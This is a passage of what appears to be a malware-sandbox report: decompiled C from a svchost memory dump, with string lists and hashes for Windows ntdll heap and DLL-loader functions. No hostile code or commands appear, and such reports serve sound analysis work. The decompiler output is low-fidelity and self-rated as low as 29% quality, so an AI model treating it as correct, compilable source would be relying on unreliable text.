                                          								_t244 = _t282;
                                          								_t281 = E03A71370(_t282, 0x3a04e90);
                                          								_pop(_t262);
                                          							} while (_t281 != 0);
                                          							_v48 = _t244;
                                          							_t242 = _v52;
                                          						}
                                          						_t201 = _v48;
                                          						_t280 = 0;
                                          						if( *_v48 != 0) {
                                          							E03A6BB40(_t262,  &_v68, _t201);
                                          							if(L03A343C0( &_v68,  &_v24) != 0) {
                                          								_t279 =  &(_t279[0]);
                                          							}
                                          						}
                                          						if(_t279 == 0) {
                                          							L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                          							_v28 = _t280;
                                          							_v16 = _t280;
                                          						}
                                          						_t202 = _v8;
                                          						if(_v8 != 0) {
                                          							L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                          						}
                                          						_v8 = _t280;
                                          						goto L28;
                                          					}
                                          				}
                                          				_t214 = _v12;
                                          				_t264 = _v12 + 4;
                                          				_v40 = _t264;
                                          				if(_t264 == 0) {
                                          					_v20 = _t280;
                                          				} else {
                                          					_t236 = L03A44620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                          					_t280 = _t236;
                                          					_v20 = _t236;
                                          					_t214 = _v12;
                                          				}
                                          				if(_t280 == 0) {
                                          					_t161 = 0;
                                          					_t280 = 0xc0000017;
                                          					_v40 = 0;
                                          					goto L48;
                                          				} else {
                                          					E03A6F3E0(_t280, _v8, _t214);
                                          					_t285 = _t285 + 0xc;
                                          					_v48 = _t280;
                                          					_t283 = E03A71370(_t280, 0x3a04e90);
                                          					_pop(_t267);
                                          					if(_t283 != 0) {
                                          						_t245 = _v48;
                                          						do {
                                          							 *_t283 = 0;
                                          							_t284 = _t283 + 2;
                                          							E03A6BB40(_t267,  &_v68, _t245);
                                          							if(L03A343C0( &_v68,  &_v24) != 0) {
                                          								_t275 = _t275 + 1;
                                          							}
                                          							_t245 = _t284;
                                          							_t283 = E03A71370(_t284, 0x3a04e90);
                                          							_pop(_t267);
                                          						} while (_t283 != 0);
                                          						_v48 = _t245;
                                          						_t242 = _v52;
                                          					}
                                          					_t224 = _v48;
                                          					_t280 = 0;
                                          					if( *_v48 != 0) {
                                          						E03A6BB40(_t267,  &_v68, _t224);
                                          						if(L03A343C0( &_v68,  &_v24) != 0) {
                                          							_t275 = _t275 + 1;
                                          						}
                                          					}
                                          					if(_t275 == 0) {
                                          						L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                          						_v40 = _t280;
                                          						_v20 = _t280;
                                          					}
                                          					_t225 = _v8;
                                          					if(_v8 != 0) {
                                          						L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                          					}
                                          					_v8 = _t280;
                                          					goto L16;
                                          				}
                                          			}


                                          Strings
                                          • WindowsExcludedProcs, xrefs: 03A33D6F
                                          • Kernel-MUI-Language-Allowed, xrefs: 03A33DC0
                                          • Kernel-MUI-Number-Allowed, xrefs: 03A33D8C
                                          • Kernel-MUI-Language-SKU, xrefs: 03A33F70
                                          • Kernel-MUI-Language-Disallowed, xrefs: 03A33E97
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 0-258546922
                                          • Opcode ID: 1de64113479e60932c101a4f1e86c7e0de7ab70e5116a1b57b786ff3959cc175
                                          • Instruction ID: 6f9fc7897c7eb6d72f6bc7451749e86cf87b7c60d62e317ec55241ea23b28c7f
                                          • Opcode Fuzzy Hash: 1de64113479e60932c101a4f1e86c7e0de7ab70e5116a1b57b786ff3959cc175
                                          • Instruction Fuzzy Hash: 97F12876D00619EFCB15DF99CA80AEEBBB9FF49750F54006BE515AB250E7349E00CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 29%
                                          			E03A240E1(void* __edx) {
                                          				void* _t19;
                                          				void* _t29;
                                          
                                          				_t28 = _t19;
                                          				_t29 = __edx;
                                          				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push("HEAP: ");
                                          						E03A2B150();
                                          					} else {
                                          						E03A2B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					E03A2B150("Invalid heap signature for heap at %p", _t28);
                                          					if(_t29 != 0) {
                                          						E03A2B150(", passed to %s", _t29);
                                          					}
                                          					_push("\n");
                                          					E03A2B150();
                                          					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                          						 *0x3b16378 = 1;
                                          						asm("int3");
                                          						 *0x3b16378 = 0;
                                          					}
                                          					return 0;
                                          				}
                                          				return 1;
                                          			}


                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                          • API String ID: 0-188067316
                                          • Opcode ID: 416654df8fd829d65c5b8d774741afdecec4e636155df8f12810216869bbae9e
                                          • Instruction ID: 0902b18ae87038e55c58bf54abaa8648e1923178cb675e41fa668d20c90e98ab
                                          • Opcode Fuzzy Hash: 416654df8fd829d65c5b8d774741afdecec4e636155df8f12810216869bbae9e
                                          • Instruction Fuzzy Hash: 5C012436285350BFD229E76CB50EF56BBB4EB01B34F19806BF00A4B792CAA49484C220
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 69%
                                          			E03A4A229(void* __ecx, void* __edx) {
                                          				signed int _v20;
                                          				char _v24;
                                          				char _v28;
                                          				void* _v44;
                                          				void* _v48;
                                          				void* _v56;
                                          				void* _v60;
                                          				void* __ebx;
                                          				signed int _t55;
                                          				signed int _t57;
                                          				void* _t61;
                                          				intOrPtr _t62;
                                          				void* _t65;
                                          				void* _t71;
                                          				signed char* _t74;
                                          				intOrPtr _t75;
                                          				signed char* _t80;
                                          				intOrPtr _t81;
                                          				void* _t82;
                                          				signed char* _t85;
                                          				signed char _t91;
                                          				void* _t103;
                                          				void* _t105;
                                          				void* _t121;
                                          				void* _t129;
                                          				signed int _t131;
                                          				void* _t133;
                                          
                                          				_t105 = __ecx;
                                          				_t133 = (_t131 & 0xfffffff8) - 0x1c;
                                          				_t103 = __edx;
                                          				_t129 = __ecx;
                                          				E03A4DF24(__edx,  &_v28, _t133);
                                          				_t55 =  *(_t129 + 0x40) & 0x00040000;
                                          				asm("sbb edi, edi");
                                          				_t121 = ( ~_t55 & 0x0000003c) + 4;
                                          				if(_t55 != 0) {
                                          					_push(0);
                                          					_push(0x14);
                                          					_push( &_v24);
                                          					_push(3);
                                          					_push(_t129);
                                          					_push(0xffffffff);
                                          					_t57 = E03A69730();
                                          					__eflags = _t57;
                                          					if(_t57 < 0) {
                                          						L17:
                                          						_push(_t105);
                                          						E03AEA80D(_t129, 1, _v20, 0);
                                          						_t121 = 4;
                                          						goto L1;
                                          					}
                                          					__eflags = _v20 & 0x00000060;
                                          					if((_v20 & 0x00000060) == 0) {
                                          						goto L17;
                                          					}
                                          					__eflags = _v24 - _t129;
                                          					if(_v24 == _t129) {
                                          						goto L1;
                                          					}
                                          					goto L17;
                                          				}
                                          				L1:
                                          				_push(_t121);
                                          				_push(0x1000);
                                          				_push(_t133 + 0x14);
                                          				_push(0);
                                          				_push(_t133 + 0x20);
                                          				_push(0xffffffff);
                                          				_t61 = E03A69660();
                                          				_t122 = _t61;
                                          				if(_t61 < 0) {
                                          					_t62 =  *[fs:0x30];
                                          					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
                                          					__eflags =  *(_t62 + 0xc);
                                          					if( *(_t62 + 0xc) == 0) {
                                          						_push("HEAP: ");
                                          						E03A2B150();
                                          					} else {
                                          						E03A2B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					_push( *((intOrPtr*)(_t133 + 0xc)));
                                          					_push( *((intOrPtr*)(_t133 + 0x14)));
                                          					_push(_t129);
                                          					E03A2B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
                                          					_t65 = 0;
                                          					L13:
                                          					return _t65;
                                          				}
                                          				_t71 = E03A47D50();
                                          				_t124 = 0x7ffe0380;
                                          				if(_t71 != 0) {
                                          					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          				} else {
                                          					_t74 = 0x7ffe0380;
                                          				}
                                          				if( *_t74 != 0) {
                                          					_t75 =  *[fs:0x30];
                                          					__eflags =  *(_t75 + 0x240) & 0x00000001;
                                          					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
                                          						E03AE138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
                                          					}
                                          				}
                                          				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
                                          				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
                                          				if(E03A47D50() != 0) {
                                          					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          				} else {
                                          					_t80 = _t124;
                                          				}
                                          				if( *_t80 != 0) {
                                          					_t81 =  *[fs:0x30];
                                          					__eflags =  *(_t81 + 0x240) & 0x00000001;
                                          					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
                                          						__eflags = E03A47D50();
                                          						if(__eflags != 0) {
                                          							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          						}
                                          						E03AE1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
                                          					}
                                          				}
                                          				_t82 = E03A47D50();
                                          				_t125 = 0x7ffe038a;
                                          				if(_t82 != 0) {
                                          					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                          				} else {
                                          					_t85 = 0x7ffe038a;
                                          				}
                                          				if( *_t85 != 0) {
                                          					__eflags = E03A47D50();
                                          					if(__eflags != 0) {
                                          						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                          						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                          					}
                                          					E03AE1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
                                          				}
                                          				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
                                          				_t91 =  *(_t103 + 2);
                                          				if((_t91 & 0x00000004) != 0) {
                                          					E03A7D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
                                          					_t91 =  *(_t103 + 2);
                                          				}
                                          				 *(_t103 + 2) = _t91 & 0x00000017;
                                          				_t65 = 1;
                                          				goto L13;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                          • API String ID: 2994545307-2586055223
                                          • Opcode ID: 0f5025818a278936721b73c749a597321d4c1b9428f9b0f782ddbdad84869fd6
                                          • Instruction ID: ddd12eea5f94531252ecb9bee90c5264acd15a9c2230c1cab6b76e8653fab7d8
                                          • Opcode Fuzzy Hash: 0f5025818a278936721b73c749a597321d4c1b9428f9b0f782ddbdad84869fd6
                                          • Instruction Fuzzy Hash: 4851F2312457819FE722DB68C949F27B7E8FB84B50F08096BF4659B3A1D735D800CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 44%
                                          			E03A58E00(void* __ecx) {
                                          				signed int _v8;
                                          				char _v12;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				intOrPtr* _t32;
                                          				intOrPtr _t35;
                                          				intOrPtr _t43;
                                          				void* _t46;
                                          				intOrPtr _t47;
                                          				void* _t48;
                                          				signed int _t49;
                                          				void* _t50;
                                          				intOrPtr* _t51;
                                          				signed int _t52;
                                          				void* _t53;
                                          				intOrPtr _t55;
                                          
                                          				_v8 =  *0x3b1d360 ^ _t52;
                                          				_t49 = 0;
                                          				_t48 = __ecx;
                                          				_t55 =  *0x3b18464; // 0x74cc0110
                                          				if(_t55 == 0) {
                                          					L9:
                                          					if( !_t49 >= 0) {
                                          						if(( *0x3b15780 & 0x00000003) != 0) {
                                          							E03AA5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                          						}
                                          						if(( *0x3b15780 & 0x00000010) != 0) {
                                          							asm("int3");
                                          						}
                                          					}
                                          					return E03A6B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                          				}
                                          				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                          				_t43 =  *0x3b17984; // 0x34036d0
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                          					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                          					if(_t48 == _t43) {
                                          						_t50 = 0x5c;
                                          						if( *_t32 == _t50) {
                                          							_t46 = 0x3f;
                                          							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                          								_t32 = _t32 + 8;
                                          							}
                                          						}
                                          					}
                                          					_t51 =  *0x3b18464; // 0x74cc0110
                                          					 *0x3b1b1e0(_t47, _t32,  &_v12);
                                          					_t49 =  *_t51();
                                          					if(_t49 >= 0) {
                                          						L8:
                                          						_t35 = _v12;
                                          						if(_t35 != 0) {
                                          							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                          								E03A59B10( *((intOrPtr*)(_t48 + 0x48)));
                                          								_t35 = _v12;
                                          							}
                                          							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                          						}
                                          						goto L9;
                                          					}
                                          					if(_t49 != 0xc000008a) {
                                          						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                          							if(_t49 != 0xc00000bb) {
                                          								goto L8;
                                          							}
                                          						}
                                          					}
                                          					if(( *0x3b15780 & 0x00000005) != 0) {
                                          						_push(_t49);
                                          						E03AA5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                          						_t53 = _t53 + 0x1c;
                                          					}
                                          					_t49 = 0;
                                          					goto L8;
                                          				} else {
                                          					goto L9;
                                          				}
                                          			}

                                          Strings
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 03A9933B, 03A99367
                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 03A99357
                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 03A9932A
                                          • LdrpFindDllActivationContext, xrefs: 03A99331, 03A9935D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 0-3779518884
                                          • Opcode ID: 76f5fee04317cb21b29b23d449b53767235ed64944fe0355b97b9dc1d275fc1a
                                          • Instruction ID: 86b2153670bb75ea852709ee2bbaa488665bacb7b4ca2a302935c37d4e496a7c
                                          • Opcode Fuzzy Hash: 76f5fee04317cb21b29b23d449b53767235ed64944fe0355b97b9dc1d275fc1a
                                          • Instruction Fuzzy Hash: 4E412D32B80311AEDF35EB089849A76B3BCB705604F0D456FFC145B591D778EC808283
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                          • API String ID: 2994545307-336120773
                                          • Opcode ID: d14300a021cf5cb247c08e5c717338fe286874b429fa2b11e78cc5381da64da3
                                          • Instruction ID: 8d1275ec903253e20fd991ba00c1b04f78364adcae7d4c0d530668d43bcef5af
                                          • Opcode Fuzzy Hash: d14300a021cf5cb247c08e5c717338fe286874b429fa2b11e78cc5381da64da3
                                          • Instruction Fuzzy Hash: DD31E539200214EFD711DB9AC98AF6BB7ACFF08734F18415BF4159B291D670E880C769
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 83%
                                          			E03A38794(void* __ecx) {
                                          				signed int _v0;
                                          				char _v8;
                                          				signed int _v12;
                                          				void* _v16;
                                          				signed int _v20;
                                          				intOrPtr _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v40;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				intOrPtr* _t77;
                                          				signed int _t80;
                                          				signed char _t81;
                                          				signed int _t87;
                                          				signed int _t91;
                                          				void* _t92;
                                          				void* _t94;
                                          				signed int _t95;
                                          				signed int _t103;
                                          				signed int _t105;
                                          				signed int _t110;
                                          				signed int _t118;
                                          				intOrPtr* _t121;
                                          				intOrPtr _t122;
                                          				signed int _t125;
                                          				signed int _t129;
                                          				signed int _t131;
                                          				signed int _t134;
                                          				signed int _t136;
                                          				signed int _t143;
                                          				signed int* _t147;
                                          				signed int _t151;
                                          				void* _t153;
                                          				signed int* _t157;
                                          				signed int _t159;
                                          				signed int _t161;
                                          				signed int _t166;
                                          				signed int _t168;
                                          
                                          				_push(__ecx);
                                          				_t153 = __ecx;
                                          				_t159 = 0;
                                          				_t121 = __ecx + 0x3c;
                                          				if( *_t121 == 0) {
                                          					L2:
                                          					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                          					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                          						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                          						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                          						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                          							L6:
                                          							if(E03A3934A() != 0) {
                                          								_t159 = E03AAA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                          								__eflags = _t159;
                                          								if(_t159 < 0) {
                                          									_t81 =  *0x3b15780; // 0x0
                                          									__eflags = _t81 & 0x00000003;
                                          									if((_t81 & 0x00000003) != 0) {
                                          										_push(_t159);
                                          										E03AA5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                          										_t81 =  *0x3b15780; // 0x0
                                          									}
                                          									__eflags = _t81 & 0x00000010;
                                          									if((_t81 & 0x00000010) != 0) {
                                          										asm("int3");
                                          									}
                                          								}
                                          							}
                                          						} else {
                                          							_t159 = E03A3849B(0, _t122, _t153, _t159, _t180);
                                          							if(_t159 >= 0) {
                                          								goto L6;
                                          							}
                                          						}
                                          						_t80 = _t159;
                                          						goto L8;
                                          					} else {
                                          						_t125 = 0x13;
                                          						asm("int 0x29");
                                          						_push(0);
                                          						_push(_t159);
                                          						_t161 = _t125;
                                          						_t87 =  *( *[fs:0x30] + 0x1e8);
                                          						_t143 = 0;
                                          						_v40 = _t161;
                                          						_t118 = 0;
                                          						_push(_t153);
                                          						__eflags = _t87;
                                          						if(_t87 != 0) {
                                          							_t118 = _t87 + 0x5d8;
                                          							__eflags = _t118;
                                          							if(_t118 == 0) {
                                          								L46:
                                          								_t118 = 0;
                                          							} else {
                                          								__eflags =  *(_t118 + 0x30);
                                          								if( *(_t118 + 0x30) == 0) {
                                          									goto L46;
                                          								}
                                          							}
                                          						}
                                          						_v32 = 0;
                                          						_v28 = 0;
                                          						_v16 = 0;
                                          						_v20 = 0;
                                          						_v12 = 0;
                                          						__eflags = _t118;
                                          						if(_t118 != 0) {
                                          							__eflags = _t161;
                                          							if(_t161 != 0) {
                                          								__eflags =  *(_t118 + 8);
                                          								if( *(_t118 + 8) == 0) {
                                          									L22:
                                          									_t143 = 1;
                                          									__eflags = 1;
                                          								} else {
                                          									_t19 = _t118 + 0x40; // 0x40
                                          									_t156 = _t19;
                                          									E03A38999(_t19,  &_v16);
                                          									__eflags = _v0;
                                          									if(_v0 != 0) {
                                          										__eflags = _v0 - 1;
                                          										if(_v0 != 1) {
                                          											goto L22;
                                          										} else {
                                          											_t128 =  *(_t161 + 0x64);
                                          											__eflags =  *(_t161 + 0x64);
                                          											if( *(_t161 + 0x64) == 0) {
                                          												goto L22;
                                          											} else {
                                          												E03A38999(_t128,  &_v12);
                                          												_t147 = _v12;
                                          												_t91 = 0;
                                          												__eflags = 0;
                                          												_t129 =  *_t147;
                                          												while(1) {
                                          													__eflags =  *((intOrPtr*)(0x3b15c60 + _t91 * 8)) - _t129;
                                          													if( *((intOrPtr*)(0x3b15c60 + _t91 * 8)) == _t129) {
                                          														break;
                                          													}
                                          													_t91 = _t91 + 1;
                                          													__eflags = _t91 - 5;
                                          													if(_t91 < 5) {
                                          														continue;
                                          													} else {
                                          														_t131 = 0;
                                          														__eflags = 0;
                                          													}
                                          													L37:
                                          													__eflags = _t131;
                                          													if(_t131 != 0) {
                                          														goto L22;
                                          													} else {
                                          														__eflags = _v16 - _t147;
                                          														if(_v16 != _t147) {
                                          															goto L22;
                                          														} else {
                                          															E03A42280(_t92, 0x3b186cc);
                                          															_t94 = E03AF9DFB( &_v20);
                                          															__eflags = _t94 - 1;
                                          															if(_t94 != 1) {
                                          															}
                                          															asm("movsd");
                                          															asm("movsd");
                                          															asm("movsd");
                                          															asm("movsd");
                                          															 *_t118 =  *_t118 + 1;
                                          															asm("adc dword [ebx+0x4], 0x0");
                                          															_t95 = E03A561A0( &_v32);
                                          															__eflags = _t95;
                                          															if(_t95 != 0) {
                                          																__eflags = _v32 | _v28;
                                          																if((_v32 | _v28) != 0) {
                                          																	_t71 = _t118 + 0x40; // 0x3f
                                          																	_t134 = _t71;
                                          																	goto L55;
                                          																}
                                          															}
                                          															goto L30;
                                          														}
                                          													}
                                          													goto L56;
                                          												}
                                          												_t92 = 0x3b15c64 + _t91 * 8;
                                          												asm("lock xadd [eax], ecx");
                                          												_t131 = (_t129 | 0xffffffff) - 1;
                                          												goto L37;
                                          											}
                                          										}
                                          										goto L56;
                                          									} else {
                                          										_t143 = E03A38A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                          										__eflags = _t143;
                                          										if(_t143 != 0) {
                                          											_t157 = _v12;
                                          											_t103 = 0;
                                          											__eflags = 0;
                                          											_t136 =  &(_t157[1]);
                                          											 *(_t161 + 0x64) = _t136;
                                          											_t151 =  *_t157;
                                          											_v20 = _t136;
                                          											while(1) {
                                          												__eflags =  *((intOrPtr*)(0x3b15c60 + _t103 * 8)) - _t151;
                                          												if( *((intOrPtr*)(0x3b15c60 + _t103 * 8)) == _t151) {
                                          													break;
                                          												}
                                          												_t103 = _t103 + 1;
                                          												__eflags = _t103 - 5;
                                          												if(_t103 < 5) {
                                          													continue;
                                          												}
                                          												L21:
                                          												_t105 = E03A6F380(_t136, 0x3a01184, 0x10);
                                          												__eflags = _t105;
                                          												if(_t105 != 0) {
                                          													__eflags =  *_t157 -  *_v16;
                                          													if( *_t157 >=  *_v16) {
                                          														goto L22;
                                          													} else {
                                          														asm("cdq");
                                          														_t166 = _t157[5] & 0x0000ffff;
                                          														_t108 = _t157[5] & 0x0000ffff;
                                          														asm("cdq");
                                          														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                          														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                          														if(__eflags > 0) {
                                          															L29:
                                          															E03A42280(_t108, 0x3b186cc);
                                          															 *_t118 =  *_t118 + 1;
                                          															_t42 = _t118 + 0x40; // 0x3f
                                          															_t156 = _t42;
                                          															asm("adc dword [ebx+0x4], 0x0");
                                          															asm("movsd");
                                          															asm("movsd");
                                          															asm("movsd");
                                          															asm("movsd");
                                          															_t110 = E03A561A0( &_v32);
                                          															__eflags = _t110;
                                          															if(_t110 != 0) {
                                          																__eflags = _v32 | _v28;
                                          																if((_v32 | _v28) != 0) {
                                          																	_t134 = _v20;
                                          																	L55:
                                          																	E03AF9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                          																}
                                          															}
                                          															L30:
                                          															 *_t118 =  *_t118 + 1;
                                          															asm("adc dword [ebx+0x4], 0x0");
                                          															E03A3FFB0(_t118, _t156, 0x3b186cc);
                                          															goto L22;
                                          														} else {
                                          															if(__eflags < 0) {
                                          																goto L22;
                                          															} else {
                                          																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                          																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                          																	goto L22;
                                          																} else {
                                          																	goto L29;
                                          																}
                                          															}
                                          														}
                                          													}
                                          													goto L56;
                                          												}
                                          												goto L22;
                                          											}
                                          											asm("lock inc dword [eax]");
                                          											goto L21;
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          						return _t143;
                                          					}
                                          				} else {
                                          					_push( &_v8);
                                          					_push( *((intOrPtr*)(__ecx + 0x50)));
                                          					_push(__ecx + 0x40);
                                          					_push(_t121);
                                          					_push(0xffffffff);
                                          					_t80 = E03A69A00();
                                          					_t159 = _t80;
                                          					if(_t159 < 0) {
                                          						L8:
                                          						return _t80;
                                          					} else {
                                          						goto L2;
                                          					}
                                          				}
                                          				L56:
                                          			}

                                          Strings
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 03A89C28
                                          • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 03A89C18
                                          • LdrpDoPostSnapWork, xrefs: 03A89C1E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 2994545307-1948996284
                                          • Opcode ID: fb64478355e070070e08c48cc60c1aa75e9ef1b3ff45e4931d593e42418689d1
                                          • Instruction ID: 81a3cde161773491751937d374366d47be299e8084cd2ef0a21492e2ee291a65
                                          • Opcode Fuzzy Hash: fb64478355e070070e08c48cc60c1aa75e9ef1b3ff45e4931d593e42418689d1
                                          • Instruction Fuzzy Hash: EC91F471A002199FDB18DF59C981ABAB3BDFF46354B5841AFF805AB250D734EA09CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 98%
                                          			E03A37E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                          				char _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				char _v24;
                                          				signed int _t73;
                                          				void* _t77;
                                          				char* _t82;
                                          				char* _t87;
                                          				signed char* _t97;
                                          				signed char _t102;
                                          				intOrPtr _t107;
